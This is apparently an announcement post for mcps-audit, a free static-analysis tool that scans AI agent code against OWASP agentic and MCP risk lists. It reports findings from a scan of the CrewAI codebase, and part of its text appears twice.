Summary
Sharing a free tool we built: mcps-audit scans AI agent code against the OWASP Agentic AI Top 10 + OWASP MCP Top 10.
npx mcps-audit ./my-agent
We ran it against CrewAI's codebase (public repo, static analysis):
- 500 files scanned, 113,094 lines
- 834 findings: 25 CRITICAL, 81 HIGH, 710 MEDIUM, 18 LOW
- Key findings: code execution patterns in tracking scripts, data exfiltration patterns in HTTP calls, missing logging in many modules
All findings are pattern-based static analysis — the tool does not execute code or send data anywhere.
What It Checks
12 rules mapped to OWASP Agentic AI Top 10 (exec/eval, hardcoded secrets, excessive permissions, prompt injection, SQL/XSS, missing sandboxing, supply chain, excessive agency, unsafe output, no logging, data exfiltration, no auth) plus 10 OWASP MCP Top 10 protocol risks.
Generates a professional PDF report with file/line/snippet and remediation for each finding.
Links
MIT licensed. Node.js 18+, one dependency (pdfkit).
Summary
Sharing a free tool we built: mcps-audit scans AI agent code against the OWASP Agentic AI Top 10 + OWASP MCP Top 10.
We ran it against CrewAI's codebase (public repo, static analysis):
All findings are pattern-based static analysis — the tool does not execute code or send data anywhere.
What It Checks
12 rules mapped to OWASP Agentic AI Top 10 (exec/eval, hardcoded secrets, excessive permissions, prompt injection, SQL/XSS, missing sandboxing, supply chain, excessive agency, unsafe output, no logging, data exfiltration, no auth) plus 10 OWASP MCP Top 10 protocol risks.
Generates a professional PDF report with file/line/snippet and remediation for each finding.
Links
MIT licensed. Node.js 18+, one dependency (pdfkit).